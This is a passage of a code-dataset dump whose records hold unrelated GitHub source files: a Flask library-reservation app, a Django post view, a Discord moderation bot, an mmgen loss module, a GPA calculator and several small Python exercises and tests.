elif search_type == \"Genre\":\n sql_search_id_title = \"%\" + search_id_title + \"%\"\n books = db.execute(f\"SELECT book_id, title, description, genre, photo_adress FROM books WHERE genre LIKE ?\", sql_search_id_title)\n return render_template(\"books_admin.html\", books=books)\n else:\n return redirect(\"/books_admin\")\n\n@app.route(\"/add_new_book_admin\", methods=[\"GET\", \"POST\"])\n@login_required\n@admin_access_required\ndef add_new_book():\n \"\"\"Add new book(s) to collection\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"title\"):\n return apology(\"must provide title\", 400)\n elif not request.form.get(\"description\"):\n return apology(\"must provide description\", 400)\n elif not request.form.get(\"genre\"):\n return apology(\"must provide genre\", 400)\n elif not request.form.get(\"photo_adress\"):\n return apology(\"must provide photo adress\", 400)\n elif not request.form.get(\"ammount\"):\n return apology(\"must provide ammount\", 400)\n\n title = str(request.form.get(\"title\"))\n description = str(request.form.get(\"description\"))\n genre = str(request.form.get(\"genre\"))\n photo_adress = request.form.get(\"photo_adress\")\n ammount = int(request.form.get(\"ammount\"))\n\n if ammount < 1:\n return apology(\"must provide ammount >= 1\", 400)\n elif len(description) > MAX_AMOUNT_OF_CHARACTERS:\n return apology(f\"must provide description with no more than {MAX_AMOUNT_OF_CHARACTERS} characters\", 400)\n\n for i in range(ammount):\n db.execute(\n \"INSERT INTO books (description, title, genre, photo_adress) VALUES(?, ?, ?, ?)\", description, title, genre, photo_adress)\n return redirect(\"/books_admin\")\n else:\n return render_template(\"add_new_book_admin.html\")\n\n@app.route(\"/admin_reservations\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_reservations():\n \"\"\"Show all reservations\"\"\"\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id\")\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n\n@app.route(\"/returned_to_collection\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef returned_to_collection():\n \"\"\"Return specific book to collection (book is free)\"\"\"\n if request.method == \"POST\":\n reservation_id = request.form.get(\"reservation_id\")\n rows = db.execute(\"SELECT book_id, deadline, users.user_id, email FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservation_id = ?\", reservation_id)[0]\n book_id = rows[\"book_id\"]\n user_id = rows[\"user_id\"]\n user_email = rows[\"email\"]\n deadline = rows[\"deadline\"]\n end_datetime = datetime.now().strftime(\"%Y-%m-%d\")\n end_date = datetime.strptime(end_datetime, \"%Y-%m-%d\")\n end_date = end_date.strftime(\"%Y-%m-%d\")\n db.execute(\"INSERT INTO history (reservation_id, book_id, user_id, email, deadline, date_returned) VALUES(?, ?, ?, ?, ?, ?)\", reservation_id, book_id, user_id, user_email, deadline, end_date)\n db.execute(\"DELETE FROM reservations WHERE reservation_id = ?\", reservation_id)\n return redirect(\"/admin_reservations\")\n\n\n@app.route(\"/send_reminder\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef send_reminder():\n \"\"\"Warn user\"\"\"\n if request.method == \"POST\":\n reservation_id = request.form.get(\"reservation_id\")\n specific_reservation = db.execute(\"SELECT book_id, deadline FROM reservations WHERE reservation_id = ?\", reservation_id)[0]\n book_id = specific_reservation[\"book_id\"]\n deadline = specific_reservation[\"deadline\"]\n user_email = db.execute(\"SELECT email FROM users INNER JOIN reservations on users.user_id=reservations.user_id WHERE reservation_id = ?\", reservation_id)[0][\"email\"]\n admin_email = str(os.environ['admin_email'])\n subject = f'Return book to the library! Reminder for reservation ID {reservation_id}'\n beginning_of_message = f'Please return borrowed book within 5 days. Book id : {book_id}, Reservation ID : {reservation_id}. Your first deadline was {deadline}.\\n'\n msg = Message(subject, sender=admin_email, recipients=[user_email])\n msg.body = beginning_of_message\n try:\n mail.send(msg)\n except:\n return apology(\"Something went wrong\", 400)\n return redirect(\"/admin_reservations\")\n\n@app.route(\"/admin_search\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_search():\n \"\"\"Search through reservations\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"search_type\") or not request.form.get(\"ID\"):\n return redirect(\"/admin_reservations\")\n search_type = request.form.get(\"search_type\")\n search_id = request.form.get(\"ID\")\n if search_type == \"User\":\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservations.user_id = ? \", search_id)\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n\n elif search_type == \"Reservation\":\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservations.reservation_id = ? \", search_id)\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n elif search_type == \"Book\":\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservations.book_id = ? \", search_id)\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n else:\n return redirect(\"/admin_reservations\")\n\n\n@app.route(\"/admin_history\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_history():\n \"\"\"Show everything from archives\"\"\"\n rows = db.execute(\"SELECT * FROM history\")\n return render_template(\"admin_history.html\", rows=rows)\n\n\n@app.route(\"/admin_history_search\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_history_search():\n \"\"\"Search archives by admin\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"search_type_history\") or not request.form.get(\"ID\"):\n return redirect(\"/admin_history\")\n search_type = request.form.get(\"search_type_history\")\n search_id = request.form.get(\"ID\")\n if search_type == \"User\":\n rows = db.execute(\"SELECT * FROM history WHERE user_id = ? \", search_id)\n return render_template(\"admin_history.html\", rows=rows)\n elif search_type == \"Book\":\n rows = db.execute(\"SELECT * FROM history WHERE book_id = ? \", search_id)\n return render_template(\"admin_history.html\", rows=rows)\n elif search_type == \"Reservation\":\n rows = db.execute(\"SELECT * FROM history WHERE reservation_id = ? \", search_id)\n return render_template(\"admin_history.html\", rows=rows)\n else:\n return redirect(\"/admin_reservations\")\n\n# User's backend!\n\n@app.route(\"/\")\n@login_required\ndef homepage():\n return render_template(\"home.html\")\n\n\n@app.route(\"/personal_data\")\n@login_required\ndef personal_data():\n \"\"\"Show user's personal data\"\"\"\n rows = db.execute(\"SELECT user_id, email, phone_number FROM users WHERE user_id = ?\", session[\"user_id\"])\n user_id = rows[0][\"user_id\"]\n email = rows[0][\"email\"]\n phone_number = rows[0][\"phone_number\"]\n return render_template(\"personal_data.html\", user_id=user_id, email=email, phone_number=phone_number)\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\n@login_required\ndef search():\n \"\"\"Search books by genres\"\"\"\n genres = db.execute(\"SELECT DISTINCT genre FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations)\")\n if request.method == \"POST\":\n chosen_genre = request.form.get(\"chosen_genre\")\n if chosen_genre == \"All\":\n books_dict = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations)\")\n else:\n books_dict = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations) AND genre LIKE ?\", chosen_genre)\n else:\n books_dict = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations)\")\n return render_template(\"search.html\", books=books_dict, genres=genres)\n\n\n@app.route(\"/reserve_book\", methods=[\"GET\", \"POST\"])\n@login_required\ndef reserve_book():\n \"\"\"Reserve book for user\"\"\"\n if request.method == \"POST\":\n reservations_dict = db.execute(\"SELECT reservation_id FROM reservations WHERE user_id = ?\", session[\"user_id\"])\n if len(reservations_dict) >= MAX_AMOUNT_OF_RESERVATIONS:\n return apology(f\"One student can borrow only {MAX_AMOUNT_OF_RESERVATIONS} books!\", 400)\n\n user_rows = db.execute(\"SELECT email FROM users WHERE user_id = ?\", session[\"user_id\"])\n user_id = session[\"user_id\"]\n user_email = user_rows[0][\"email\"]\n book_id = request.form.get(\"reserved_book\")\n\n begin_datetime = datetime.now().strftime(\"%Y-%m-%d\")\n begin_date = datetime.strptime(begin_datetime, \"%Y-%m-%d\")\n \n # Deadline is 30 days later\n deadline = (begin_date + timedelta(days=30)).strftime(\"%Y-%m-%d\")\n begin_date = begin_date.strftime(\"%Y-%m-%d\")\n db.execute(\n \"INSERT INTO reservations (book_id, user_id, deadline) VALUES(?, ?, ?)\", book_id, user_id, deadline)\n\n reservation_id = db.execute(\"SELECT reservation_id FROM reservations ORDER BY reservation_id DESC LIMIT 1\")[0][\"reservation_id\"]\n book_title = db.execute(\"SELECT title FROM books WHERE book_id = ?\", book_id)[0][\"title\"]\n\n generate_qrcode_for_reservation(book_id, book_title, reservation_id, user_email, user_id)\n send_reservation_details(book_id, book_title, reservation_id, user_email, mail)\n return redirect(\"/reservations\")\n else:\n return redirect(\"/reservations\")\n\n@app.route(\"/reservations\", methods=[\"GET\", \"POST\"])\n@login_required\ndef reservations():\n \"\"\"Show user's reservations\"\"\"\n reservations_dict = db.execute(\n \"SELECT reservation_id, reservations.book_id, title, photo_adress, deadline FROM reservations INNER JOIN books ON books.book_id=reservations.book_id WHERE user_id = ?\", session[\"user_id\"])\n return render_template(\"reservations.html\", reservations=reservations_dict)\n\n@app.route(\"/contact_us\", methods=[\"GET\", \"POST\"])\n@login_required\ndef contact_us():\n \"\"\"Send help form to administrator\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"message\"):\n return apology(\"must provide message\", 400)\n\n message = str(request.form.get(\"message\"))\n if len(message) > MAX_AMOUNT_OF_CHARACTERS:\n return apology(f\"Your message is too long! Max {MAX_AMOUNT_OF_CHARACTERS} characters\", 400)\n\n rows = db.execute(\"SELECT * FROM users WHERE user_id = ?\", session[\"user_id\"])\n\n admin_email = str(os.environ['admin_email'])\n user_email = str(rows[0]['email'])\n user_phone = str(rows[0]['phone_number'])\n\n subject = f'New library message from {user_email} appears!'\n beginning_of_message = f'User {user_email} (ID {session[\"user_id\"]}) with phone number {user_phone} wrote to you: \\n'\n message = beginning_of_message + message\n msg = Message(subject, sender=admin_email, recipients=[admin_email])\n msg.body = message\n try:\n mail.send(msg)\n except:\n return apology(\"Something went wrong\", 400)\n return redirect(\"/\")\n\n else:\n return render_template(\"contact_us.html\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n\n # Forget any user_id\n session.clear()\n\n if request.method == \"POST\":\n if not request.form.get(\"email\"):\n return apology(\"must provide email\", 400)\n\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n\n # Check if user is an admin\n admin_rows = db.execute(\"SELECT * FROM admins WHERE email = ?\", request.form.get(\"email\"))\n if len(admin_rows) == 1 and check_password_hash(admin_rows[0][\"hash\"], request.form.get(\"password\")):\n session[\"user_id\"] = admin_rows[0][\"admin_id\"]\n return redirect(\"/admin\")\n\n rows = db.execute(\"SELECT * FROM users WHERE email = ?\", request.form.get(\"email\"))\n\n # Ensure email exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 400)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"user_id\"]\n\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register new user\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"email\"):\n return apology(\"must provide email\", 400)\n elif not request.form.get(\"phone_number\"):\n return apology(\"must provide phone number\", 400)\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n elif not request.form.get(\"check_password\"):\n return apology(\"must confirm password\", 400)\n\n email = request.form.get(\"email\")\n phone_number = request.form.get(\"phone_number\")\n password = request.form.get(\"password\")\n confirmation = request.form.get(\"check_password\")\n\n if password != confirmation:\n return apology(\"passwords do not match\", 400)\n\n rows = db.execute(\"SELECT * FROM users WHERE email = ?\", email)\n if len(rows) >= 1:\n return apology(\"username with that email already exists\", 400)\n\n hash = generate_password_hash(password)\n db.execute(\"INSERT INTO users (phone_number, email, hash) VALUES(?, ?, ?)\", phone_number, email, hash)\n return redirect(\"/\")\n\n else:\n return render_template(\"register.html\")\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect(\"/\")","repo_name":"Resmakor/Online-Library-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6580267724","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ValidationError\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import FormView\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom . import models\n\n\n@method_decorator(login_required(login_url='/account/login/'), name='dispatch')\nclass MakePostView(FormView):\n template_name = 'interaction/make_post.html'\n\n def get(self, request, *args, **kwargs):\n full_name = request.user.get_full_name()\n\n status = 'You are logged in.'\n name = full_name if not full_name.isspace() else request.user.email\n template_file = 'account_modal.html'\n return render(request, self.template_name,\n context={\n 'section_name': _('Draft'),\n 'logged_in': _(status),\n 'name': name,\n 'template_file': template_file,\n })\n\n def post(self, request, *args, **kwargs):\n data = request.POST\n story = models.Post()\n story.make_new_post(request=request,\n title=data['title'],\n content_body=data['content_body'])\n story.subtitle = data['subtitle'].strip()\n story.tldr = data['tldr'].strip()\n messages = []\n try:\n story.save()\n messages += 'Your post is published.'\n return JsonResponse({\n 'messages': messages,\n 'url': '/login/',\n 'all_clear': True,\n })\n except ValidationError as ve:\n messages += ve\n return JsonResponse({\n 'messages': messages,\n 'url': '/new-story/',\n 'all_clear': False,\n })\n","repo_name":"walter090/notitia","sub_path":"interaction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2899018687","text":"\"\"\"\nKlasa Kwiat:\natrybuty instancji:\nnazwa,kolor, odmiana, wzrost\nfunkcjonalnosc: rosnij, malej\n\n\"\"\"\n\n\nclass Kwiat:\n\n def __init__(self, name, kolor, odmiana, wzrost ):\n self.name = name\n self.kolor = kolor\n self.odmiana = odmiana\n self.wzrost = wzrost\n\n def rosnij(self):\n self.wzrost += 1\n\n def malej(self):\n self.wzrost -= 1\n\n\nkwiat = Kwiat('roza', 'red', 'k1', 30)\nprint(f'Sadzimy kwiat {kwiat.name}')\nfor i in range(15):\n print(f'W dniu {i} wysokość kwiata wynosi: {kwiat.wzrost}')\n kwiat.rosnij()\n \n","repo_name":"1piotrnowicki1/infoshare_cwiczenia","sub_path":"zjazd_4_OOP/ćwiczenie_class_kwiat.py","file_name":"ćwiczenie_class_kwiat.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2858233085","text":"'''\n@Time : 2022/7/14 14:43\n@Author : leeguandon@gmail.com\n'''\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mmgen.models.losses.utils import weighted_loss\nfrom mmgen.models.builder import MODULES\n\n\n@weighted_loss\ndef cross_entropy(pred, target):\n return F.cross_entropy(pred, target, reduction='none')\n\n\n@MODULES.register_module()\nclass CrossEntropy(nn.Module):\n def __init__(self, loss_weight=1.0, data_info=None, loss_name='cross_entropy'):\n super(CrossEntropy, self).__init__()\n self.loss_weight = loss_weight\n self.data_info = data_info\n self._loss_name = loss_name\n\n def forward(self, *args, **kwargs):\n if self.data_info is not None:\n # parse the args and kwargs\n if len(args) == 1:\n assert isinstance(args[0], dict), (\n 'You should offer a dictionary containing network outputs '\n 'for building up computational graph of this loss module.')\n outputs_dict = args[0]\n elif 'outputs_dict' in kwargs:\n assert len(args) == 0, (\n 'If the outputs dict is given in keyworded arguments, no'\n ' further non-keyworded arguments should be offered.')\n outputs_dict = kwargs.pop('outputs_dict')\n else:\n raise NotImplementedError(\n 'Cannot parsing your arguments passed to this loss module.'\n ' Please check the usage of this module')\n # link the outputs with loss input args according to self.data_info\n loss_input_dict = {\n k: outputs_dict[v]\n for k, v in self.data_info.items()\n }\n kwargs.update(loss_input_dict)\n kwargs.update(dict(weight=self.loss_weight))\n return cross_entropy(**kwargs)\n else:\n return cross_entropy(*args, weight=self.loss_weight, **kwargs)\n\n def loss_name(self):\n return self._loss_name\n","repo_name":"leeguandong/mmgeneration_add","sub_path":"mmgen_add/models/losses/pixelwise_loss.py","file_name":"pixelwise_loss.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18099162454","text":"# Done By the Almighty Kushurox helpers:-\n# 1]Jackaboi\n# I am still working on this\nimport discord\nfrom discord.ext import commands\nimport asyncio\nimport random\nimport os\n\nclient = commands.Bot(command_prefix=\"k!\")\n\ncount = 0\nhelp_msg = \"Toss\\nClr\\nrps rock|paper|scissor\\ncredits\\ncmds\\ntimer SEC|MINS\\nroles [optional argument]\\nkick\\nmute [member] [time OPTIONAL]\\nunmute [member]\"\ncredits_msg= \"Kushurox aka Kushal\\nJackaboi (his yt:https://www.youtube.com/channel/UCNp8BvJDLjsxFwl97FgDX7A)\"\nrestricted_words = [\"FUCK\",\"WTF\",\"FUK\",\"GAY\",\"STFU\"]\nroles_msg = \"**ROLES**\\npervert\\ndark\\nsenpai\\n\\n***NOTE:Please add the roles in the server roles before using these***\"\nroles_list = [\"pervert\",\"dark\",\"senpai\"]\n@client.event\nasync def on_ready():\n print(\"{0.user.name} with an id {1.user.id} logged in!\".format(client,client))\n await client.change_presence(game=discord.Game(name=\"with my k!cmds\"))\n@client.command()\nasync def toss():\n k = random.randint(0,1)\n if k == 0:\n await client.say(\"Heads\")\n else:\n await client.say(\"Tails\")\n\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def clr(ctx, amount=\"0\"):\n try:\n args = int(amount)\n if args == 0:\n await client.say(\"Please provide a valid argument\")\n return False\n elif args < 0:\n await client.say(\"Please provide an positive integer\")\n return False\n else:\n await client.purge_from(ctx.message.channel, limit=args)\n return True\n except ValueError:\n await client.say(\"Please provide numbers only\")\n except discord.HTTPException:\n await client.say(\"bad request please provide small numbers to prevent such issues\")\n@client.command(pass_context=True)\nasync def rps(ctx):\n k = random.randint(0,2)\n args = ctx.message.content.split(\" \")\n try:\n if args[1].upper() == \"ROCK\" or args[1].upper() == \"SCISSOR\" or args[1].upper() == \"PAPER\":\n if k == 0:\n await client.say(\"<@{0.message.author.id}> you win :D !\".format(ctx))\n elif k == 1:\n await client.say(\"<@{0.message.author.id}> Tie :| !\".format(ctx))\n else:\n await client.say(\"<@{0.message.author.id}> You Lose ;( !\".format(ctx))\n else:\n await client.say(\"Invalid Arguments try k!help\")\n except IndexError:\n await client.say(\"No Arguments Provided try k!help\")\n@client.command()\nasync def cmds():\n helpembed = discord.Embed(description=help_msg, colour=discord.Color.blue())\n helpembed.set_author(name=\"KushBot\")\n await client.say(embed=helpembed)\n\n@client.command()\nasync def credits():\n creditsembed = discord.Embed(description=credits_msg, colour=discord.Color.purple())\n creditsembed.set_author(name=\"Kushbot\")\n await client.say(embed=creditsembed)\n@client.event\nasync def on_message(message):\n k = message.content.upper().split(\" \")\n for j in k:\n if j in restricted_words:\n await client.delete_message(message)\n await client.send_message(message.channel, \"<@%s> Such words are not allowed!\" % (message.author.id))\n break\n await client.process_commands(message)\n@client.event\nasync def on_member_join(member: discord.Member):\n try:\n serverchannel = discord.utils.get(member.server.channels, name=\"join-leave-messages\")\n role = discord.utils.get(member.server.roles, id=\"member\")\n await client.add_roles(member, role)\n emb1 = (discord.Embed(description=\"Yo Welcome to our channel <@%s>\\nWant cool ranks please do k!roles\" % (member.id), colour=0x3DF270))\n emb1.set_author(name=\"KushBot\")\n await client.send_message(serverchannel, embed=emb1)\n except discord.Forbidden:\n serverchannel = discord.utils.get(member.server.channels, name=\"join-leave-messages\")\n emb1 = (discord.Embed(description=\"Yo Welcome to our channel <@%s>\\nWant cool ranks please do k!roles\" % (member.id), colour=0x3DF270))\n emb1.set_author(name=\"KushBot\")\n await client.send_message(member.channel, embed=emb1)\n except:\n emb1 = (discord.Embed(description=\"Yo Welcome to our channel <@%s>\\nWant cool ranks please do k!roles\" % (member.id), colour=0x3DF270))\n emb1.set_author(name=\"KushBot\")\n await client.send_message(serverchannel, embed=emb1)\n@client.event\nasync def on_member_remove(member: discord.Member):\n try:\n serverchannel = discord.utils.get(member.server.channels, name=\"join-leave-messages\")\n meml = member.name\n embl = (discord.Embed(description= meml+\" has left T_T.He/she/it doesn't knows the value of this server\", colour=0x3DF170))\n embl.set_author(name=\"KushBot\")\n await client.send_message(serverchannel, embed=embl)\n except:\n meml = member.name\n embl = (discord.Embed(description= meml+\" has left T_T.He/she/it doesn't knows the value of this server\", colour=0x3DF170))\n embl.set_author(name=\"KushBot\")\n await client.say(embed=embl)\n@client.command(pass_context=True)\nasync def timer(ctx, units = \"none\", amount :int = -1, *, reason = \" \"):\n \n if amount == -1:\n await client.say(\"Invalid Argument try for k!help or k!cmds\")\n return False\n elif amount == 0:\n await client.send_message(ctx.message.author, \"Are you a fool????\")\n return False\n elif units == \"none\":\n await client.send_message(ctx.message.channel, \"Invalid Argument try k!help or k!cmds\")\n return False\n elif units.upper() == \"MINS\":\n await client.send_message(ctx.message.author, \"No worries do your job ill Remind you :wink:\\nReason:\" + reason)\n await asyncio.sleep(amount * 60)\n await client.send_message(ctx.message.author, \"Timer is done get back!\\nReason:\" + reason)\n elif units.upper() == \"SEC\":\n await client.send_message(ctx.message.author, \"No worries do your job ill Remind you :wink:\\nReason:\" + reason)\n await asyncio.sleep(amount)\n await client.send_message(ctx.message.author, \"Timer is done get back!\\nReason:\" + reason)\n else:\n await client.say(\"Something is wrong\")\n@client.command(pass_context=True)\nasync def roles(ctx, rolename = \"none\"):\n if rolename == \"none\":\n rembed = discord.Embed(description=roles_msg, colour=discord.Color.dark_gold())\n rembed.set_author(name=\"KushBot\")\n await client.say(embed=rembed)\n elif rolename in roles_list:\n if rolename not in ctx.message.author.roles:\n role = discord.utils.get(ctx.message.server.roles, name=rolename)\n await client.add_roles(ctx.message.author, role)\n await client.say(\"**Role set**\")\n else:\n role = discord.utils.get(ctx.message.server.roles, name=rolename)\n await client.remove_roles(ctx.message.author, role)\n await client.say(\"**Role Removed**\")\n else:\n await client.say(\"Role not exisitng.\")\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def kick(ctx, name : discord.Member = \"none\"):\n try:\n if name == \"none\":\n await client.say(\"Who the fish should i kick?\")\n return False\n await client.kick(name)\n await client.say(\"Kicked his ass :wink:\")\n except discord.Forbidden:\n await client.say(\"I lack perms bruhh\")\n except:\n await client.say(\"User not existing\")\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def mute(ctx, member : discord.Member = None, minutes = \"0\"):\n try:\n time = int(minutes)\n if member != None and time == 0:\n try:\n role= discord.utils.get(ctx.message.server.roles, name=\"Muted\")\n await client.add_roles(member, role)\n emb1 = discord.Embed(description=\"Shut up {0.name} you have been muted\\nduration:∞\".format(member), colour=discord.Color.blue())\n emb1.set_author(name=\"KushBot\")\n await client.say(embed=emb1)\n except discord.Forbidden:\n await client.say(\"I dont have permissions ;(\")\n except:\n await client.say(\"Role not existing please create one\")\n elif member != None and time != 0:\n try:\n role = discord.utils.get(ctx.message.server.roles, name=\"Muted\")\n await client.add_roles(member, role)\n emb1 = discord.Embed(description=\"Shut up {0.name} you have been muted\\nduration:{1} min\".format(member,time),colour=discord.Color.blue())\n emb1.set_author(name=\"KushBot\")\n await client.say(embed=emb1)\n await asyncio.sleep(time * 60)\n await client.remove_roles(member, role)\n await client.say(\"You have been unmuted <@{0.id}>\".format(member))\n except discord.Forbidden:\n await client.say(\"I lack perms ;(\")\n except:\n await client.say(\"Role Not existing please create one\")\n elif member != None and time < 0:\n await client.say(\"Provide a positive integer\")\n return False\n else:\n await client.say(\"Invalid Arguments please try k!cmds\")\n return False\n except:\n await client.say(\"Invalid Arguments try k!cmds\")\n@client.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def unmute(ctx, member : discord.Member = None):\n try:\n if member == None:\n await client.say(\"Who the fish should i mute?\")\n return False\n m_role = discord.utils.get(ctx.message.server.roles, name=\"Muted\")\n await client.remove_roles(member, m_role)\n await client.say(\"fine fine you can talk... {0.name}\".format(member))\n except discord.Forbidden:\n await client.say(\"I lack perms bruhh\")\n except:\n await client.say(\"Role not Existing\")\n\n \n\n\n\n\n\n\n \n\nclient.run(os.getenv('TOKEN'))\n","repo_name":"Lordksk/MyDiscordBot","sub_path":"KushBot.py","file_name":"KushBot.py","file_ext":"py","file_size_in_byte":10051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28603292170","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 4 09:53:52 2020\r\n\r\n@author: Kyra\r\n\"\"\"\r\n#Focus on lists, loops, if-else, print output(?)\r\ngrade_list = []\r\ncredit_list = []\r\nname_list = []\r\nx = 1\r\ntotal_credits = 0\r\ntotal_points = 0\r\nprint('Semester GPA calculator')\r\nnum_of_classes = int(input('How many classes did you have?: '))\r\nwhile x <= num_of_classes:\r\n name1 = input('Name of class ' + str(x) + ': ')\r\n name_list.append(name1)\r\n credit = 0\r\n while True:\r\n credit = input('How many credits was the class?: ')\r\n if credit.isdigit():\r\n break\r\n else:\r\n print('Invalid, enter an integer')\r\n credit_list.append(int(credit))\r\n while True: #wth is this\r\n grade1 = input('What grade did you get? (A,B,C,D,F): ')\r\n grade1 = grade1.upper()\r\n if grade1 == 'A':\r\n grade1 = 4.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'B':\r\n grade1 = 3.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'C':\r\n grade1 = 2.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'D':\r\n grade1 = 1.0\r\n grade_list.append(grade1)\r\n elif grade1 == 'F':\r\n grade1 = 0.0\r\n grade_list.append(grade1)\r\n else:\r\n print('Invalid input, try again')\r\n continue\r\n break\r\n x += 1\r\ni = 0\r\nfor i in range(0, len(grade_list)): \r\n total_credits = total_credits + credit_list[i] \r\n total_points = total_points + (grade_list[i] * credit_list[i])\r\nprint(name_list)\r\nprint(grade_list)\r\nprint(credit_list)\r\nprint('Total points: ',total_points)\r\nprint('Total credit hours: ', total_credits)\r\nfinal_gpa = total_points/total_credits\r\nprint('Semester GPA: %0.2f'% (final_gpa))","repo_name":"pymavs-uta/GPA-Calculator","sub_path":"Basic/gpa.py","file_name":"gpa.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38594813054","text":"import os\nimport pytest\n\nimport django.test\n\nfrom backend.oadoi import OadoiAPI\nfrom papers.models import Paper\n\n@pytest.mark.usefixtures(\"load_test_data\")\nclass OadoiAPITest(django.test.TestCase):\n\n @classmethod\n def setUpClass(cls):\n super(OadoiAPITest, cls).setUpClass()\n cls.testdir = os.path.dirname(os.path.abspath(__file__))\n\n @pytest.mark.usefixtures('mock_doi')\n def test_ingest_dump(self):\n doi = '10.1080/21645515.2017.1330236'\n p = Paper.create_by_doi(doi)\n self.assertEqual(p.pdf_url, None)\n Paper.create_by_doi(doi)\n\n # then load an OAdoi dump\n oadoi = OadoiAPI()\n oadoi.load_dump(os.path.join(self.testdir, 'data/sample_unpaywall_snapshot.jsonl.gz'))\n\n # the paper is now OA, yay!\n p = Paper.get_by_doi(doi)\n self.assertEqual(p.pdf_url, 'http://europepmc.org/articles/pmc5718814?pdf=render')\n","repo_name":"dissemin/dissemin","sub_path":"backend/tests/test_oadoi.py","file_name":"test_oadoi.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"21"} +{"seq_id":"33792759645","text":"import pprint\nfrom skills import *\n\ndef gleichung(erg,schablone):\n buchstaberl =[]\n glgs =[]\n for i in erg:\n expo =i[1]\n links =list(filter(lambda x: x[2] ==expo,schablone))\n glgs.append([i[0],links])\n #p##print.p##print(glgs)\n def watchInLetters(letters,glgi):\n for letter in letters:\n i=0\n while i 0:\n appender.append(True)\n else:\n appender.append(False)\n #print(appender)\n returner.append(appender)\n return returner\n\n\n\n\ndef termSchablone(highestExpo,nullst) ->list:\n highestExpo =highestExpo+1\n schablone=[]\n letters =\"abcdefghijklmnopqrstuvwxyz\"\n charindex =0\n while highestExpo >-1: \n glied_1 =None\n glied_2 =None\n ko_1 =(1.0,letters[charindex])\n ko_2 =(-nullst,letters[charindex])\n ###print(ko_2)\n expo_1 =highestExpo\n expo_2 =highestExpo-1\n ###print(expo_2)\n if expo_1 >1:\n glied_1=[*ko_1,expo_1,True]\n glied_2=[*ko_2,expo_2,True]\n elif expo_1 ==1:\n glied_1=[*ko_1,expo_1,True]\n glied_2=[*ko_2,expo_2,False]\n elif expo_1 == 0:\n glied_1=[*ko_1,expo_1,False]\n highestExpo=highestExpo-1\n charindex=charindex+1\n \n for eintrag in 